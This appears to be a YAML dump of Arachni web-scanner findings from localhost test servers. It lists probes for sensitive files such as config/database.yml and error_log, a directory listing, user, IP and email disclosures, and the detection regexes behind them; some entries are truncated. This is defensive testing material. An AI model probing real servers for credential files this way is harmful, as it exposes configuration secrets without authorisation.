S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/config/database.yml
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/config/database.yml
injected: database.yml
id: database.yml
elem: path
remarks: {}
method: ''
response: config/database.yml
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/_mmDBScripts/MMHTTPDB.php
injected: MMHTTPDB.php
id: MMHTTPDB.php
elem: path
remarks: {}
method: ''
response: _mmDBScripts/MMHTTPDB.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/wp-admin/setup-config.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/wp-admin/setup-config.php
injected: setup-config.php
id: setup-config.php
elem: path
remarks: {}
method: ''
response: wp-admin/setup-config.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/wp-admin/install.php
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/wp-admin/install.php
injected: install.php
id: install.php
elem: path
remarks: {}
method: ''
response: wp-admin/install.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
url: http://localhost:10925/error_log
elem: path
method: ''
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
Apache.org: http://httpd.apache.org/docs/2.0/mod/mod_access.html
opts:
:regexp: ''
url: http://localhost:10925/error_log
injected: error_log
id: error_log
elem: path
remarks: {}
method: ''
response: error_log
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common sensitive file
description: Tries to find common sensitive files on the server.
tags:
- common
- path
- file
- discovery
severity: Low
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common files
variations: []
internal_modname: CommonFiles
internal_modname: CommonFiles
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/548.html
var:
url: http://localhost:10920/some/
elem: server
method: GET
name: Directory listing
description: ! "In most circumstances enabling directory listings is a bad practise\n
\ as it allows an attacker to better grasp the web application's structure."
tags:
- path
- directory
- listing
- index
cwe: '548'
cwe_url: http://cwe.mitre.org/data/definitions/548.html
severity: Low
remedy_guidance: ! "Restrict access to important directories or files by adopting
a need to know requirement for both the document and server root,\n and
turn off features such as Automatic Directory Listings."
mod_name: Directory listing
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/548.html
opts:
:element: server
:regexp: ''
var:
url: http://localhost:10920/some/
injected:
id:
regexp: ''
regexp_match:
elem: server
remarks: {}
method: GET
response: /home/zapotek/workspace/arachni/spec/servers/modules/recon/xst.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/htaccess_limit.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/http_put.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/webdav.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/allowed_methods.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_directories.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/interesting_responses.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/backdoors.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/backup_files.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/directory_listing.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/common_files.rb
/home/zapotek/workspace/arachni/spec/servers/modules/recon/grep
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTM1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Directory listing
description: ! "In most circumstances enabling directory listings is a bad practise\n
\ as it allows an attacker to better grasp the web application's structure."
tags:
- path
- directory
- listing
- index
cwe: '548'
cwe_url: http://cwe.mitre.org/data/definitions/548.html
severity: Low
remedy_guidance: ! "Restrict access to important directories or files by adopting
a need to know requirement for both the document and server root,\n and
turn off features such as Automatic Directory Listings."
mod_name: Directory listing
variations: []
internal_modname: DirectoryListing
internal_modname: DirectoryListing
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
var:
url: http://localhost:14998/id
elem: body
method: GET
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
opts:
:regexp: ! '(?-mix:\$Id: .* (\w+) Exp \$)'
:match: john_id1
:element: body
var:
url: http://localhost:14998/id
injected:
id:
regexp: ! '(?-mix:\$Id: .* (\w+) Exp \$)'
regexp_match: john_id1
elem: body
remarks: {}
method: GET
response: ! '$Id: https-test.pl 1081 2008-09-30 19:03:23Z john_id1 Exp $ '
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations: []
internal_modname: CvsSvnUsers
internal_modname: CvsSvnUsers
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
var:
url: http://localhost:14998/id2
elem: body
method: GET
name: CVS/SVN user disclosure
description: A CVS or SVN user is disclosed in the body of the HTML page.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove all CVS and SVN users from the body of the HTML page.
mod_name: CVS/SVN users
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/200.html
opts:
:regexp: ! '(?-mix:\$Id: .* (\w+) (?\n \n"
:element: form
:regexp: ''
var: insecure
url: http://localhost:14682/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTcy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations: []
internal_modname: PasswordAutocomplete
internal_modname: PasswordAutocomplete
- !ruby/object:Arachni::Issue
verification: false
references: {}
var: insecure_2
url: http://localhost:14682/insecure
elem: form
method: GET
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:var: !binary |-
aW5zZWN1cmVfMg==
:match: ! ""
:element: form
:regexp: ''
var: insecure_2
url: http://localhost:14682/insecure
injected:
id:
regexp: ''
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n\n \n\n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTcy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Password field with auto-complete
description: ! "Some browsers automatically fill-in forms with\n sensitive
user information for fields that don't have\n the auto-complete
feature explicitly disabled."
tags: []
severity: Low
mod_name: Password field with auto-complete
variations: []
internal_modname: PasswordAutocomplete
internal_modname: PasswordAutocomplete
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
var: Disclosure
url: http://localhost:6217/header
elem: header
method: GET
name: Private IP address disclosure
description: A private IP address is disclosed in the body of the HTML page
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Low
remedy_guidance: Remove private IP addresses from the body of the HTML pages.
mod_name: Private IP address finder
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://projects.webappsec.org/w/page/13246936/Information%20Leakage
opts:
:var: !binary |-
RGlzY2xvc3VyZQ==
:regexp: (?-mix:(?\n \n"
:element: form
var:
url: http://localhost:7111/captcha
injected:
id:
regexp: (?i-mx:captcha)
regexp_match: ! ""
elem: form
remarks: {}
method: GET
response: ! " \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToyOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: CAPTCHA protected form
description: Arachni can't audit CAPTCHA protected forms, consider auditing manually.
tags: []
severity: Informational
mod_name: CAPTCHA
variations: []
internal_modname: CAPTCHA
internal_modname: CAPTCHA
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/3
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: a.little.more.unusual@dept.example.com
:element: body
var:
url: http://localhost:12932/3
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: a.little.more.unusual@dept.example.com
elem: body
remarks: {}
method: GET
response: a.little.more.unusual@dept.example.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/2
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: john32.21d@foo.blah.com
:element: body
var:
url: http://localhost:12932/2
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: john32.21d@foo.blah.com
elem: body
remarks: {}
method: GET
response: john32.21d@foo.blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/1
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: john@foo.blah.com
:element: body
var:
url: http://localhost:12932/1
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: john@foo.blah.com
elem: body
remarks: {}
method: GET
response: john@foo.blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:12932/0
elem: body
method: GET
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
:match: tasos@blah.com
:element: body
var:
url: http://localhost:12932/0
injected:
id:
regexp: (?i-mx:[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})
regexp_match: tasos@blah.com
elem: body
remarks: {}
method: GET
response: tasos@blah.com
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: E-mail address disclosure
description: An e-mail address is being disclosed.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
remedy_guidance: ! "E-mail addresses should be presented in such\n a
way that it is hard to process them automatically."
mod_name: E-mail address
variations: []
internal_modname: EMails
internal_modname: EMails
- !ruby/object:Arachni::Issue
verification: false
references: {}
var:
url: http://localhost:7085/
elem: body
method: GET
name: HTML object
description: Greps pages for HTML objects.
tags: []
cwe: '200'
cwe_url: http://cwe.mitre.org/data/definitions/200.html
severity: Informational
mod_name: HTML objects
variations:
- !ruby/object:Arachni::Issue
verification: false
references: {}
opts:
:regexp: (?mi-x:(.*)<\/object>)
:match: ! ' width="400" height="400" data="helloworld.swf"'
:element: body
var:
url: http://localhost:7085/
injected:
id:
regexp: (?mi-x:(.*)<\/object>)
regexp_match: ! ' width="400" height="400" data="helloworld.swf"'
elem: body
remarks: {}
method: GET
response: ! '
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
